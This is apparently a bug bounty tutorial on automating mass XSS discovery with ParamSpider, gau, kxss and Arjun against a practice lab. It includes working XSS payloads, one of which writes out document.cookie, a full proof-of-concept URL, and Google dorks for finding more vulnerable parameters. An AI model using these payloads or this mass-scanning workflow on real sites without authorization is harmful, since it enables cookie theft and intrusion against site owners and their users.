Hello dear friends, Assalom O Lakum, Masaud here. How are you all? Today, I will teach you how to automate XSS using a technique that will help you automate cross-site scripting vulnerability and hunt XSS on a large number of websites. In this method, we will mainly use four tools. (How to Automate XSS Vulnerability Hunting – Mass XSS Hunting)
ParamSpider: With the help of ParamSpider, we can identify parameters of any website or web application and test them, including hunting for XSS on those parameters. This tool is very useful for discovering hidden or lesser-known endpoints.
Gau: Gau is an excellent tool created by Tomnomnom. With Gau, you can perform reconnaissance and information gathering. You can also use it to find URLs and subdomains, collecting information from various resources and search engines like web archives, etc.
Kxss: Kxss is a tool that allows us to identify XSS vulnerabilities. It performs payloads on possible parameters and shows us the parameters’ data in the result that we can use to discover XSS.
Arjun: Arjun is a command-line tool that allows us to identify parameters and endpoints and find vulnerabilities in them. An important use of this tool is that we can also perform parameter bruteforcing to find hidden parameters.
Now that we have introduced the tools, let’s move on to our main topic, which is hunting XSS vulnerabilities using these tools.
Advanced Bug Bounty Automation
The use of ParamSpider
python3 paramspider.py -d vulnweb.com -o parameters.txt
When we hit this command, ParamSpider extracts a number of parameters from our targeted application/website. All the parameters are saved in a file called “parameters.txt” in the output folder.
PS: Here, I am targeting a lab. I cannot test on a live target as it would be totally illegal.
The use of kxss to hunt XSS
cat parameters.txt | kxss
After that, I ran the second command in which I am catting the parameters.txt file and running the kxss tool on it. The kxss tool has shown me all the parameters that are vulnerable to XSS. You should only try on parameters that are not filtering the following characters (” ‘ < > $ | ( ) `:; {} ) which are the parameters that have these characters in front of them are vulnerable to XSS.
I have taken a simple parameter and added my payload to it.
my payload : "><img%20src=x%20onerror="alert(%27POC%20By%20Masaud%27)"
http://testphp.vulnweb.com/hpp/index.php?pp=FUZZ
complete url to popup xss: http://testphp.vulnweb.com/hpp/index.php?pp=%22%3E%3Cimg%20src=x%20onerror=%22alert(%27POC%20By%20Masaud%27)%22
I hope you have understood it. If your payload does not work in some cases, you can intercept that request and send it to Burp Repeater and manually create a payload. You can also seek help from ChatGPT.
If you come across such parameters in a bug bounty program or private pentest that pop up an XSS, explore them further. It is possible that there are other parameters that are vulnerable to XSS, but ParamSpider was unable to crawl them. In such a situation, you can always use Google dorking.
Hunting XSS using Google dorking
site:"example.com" inurl:"?goto="
In my case, the parameter was “?pp=” and the URL was testphp.vulnweb.com, so I created a Google dork for it.
site:"testphp.vulnweb.com" inurl:"?pp=="
If you find extra pages on Google that contain the same parameter, there is a high chance of finding an XSS vulnerability there. After that, you can use the gau tool to find the same parameters and hunt for XSS on them. (How to Automate XSS Vulnerability Hunting – Mass Cross-Site Scripting)
gau example.com | grep "?goto="
gau testphp.vulnweb.com | grep "?pp="
Find more parameters using Gau for mass Hunting
You can see that gau tool has given me more parameters that have high chances of having an XSS vulnerability. You can start injecting your XSS payload here. I will try my second payload this time.
<%2FScriPt><sCripT+class%3DMasaud>document.write(document.cookie);<%2FsCriPt>
Our second payload did not work, but our original payload was successful. You can easily hunt for cross-site scripting vulnerabilities by using this method with URLs.
Use Arjun to find more parameters
arjun -u example.com/login.jsp
Using the Arjun tool, you can find more interesting parameters to try XSS attacks on. Keep trying harder and you will find more XSS vulnerabilities. (How to Automate XSS Vulnerability Hunting – Mass Cross-Site Scripting )
Happy hacking…! And follow me on Twitter @masaudsec.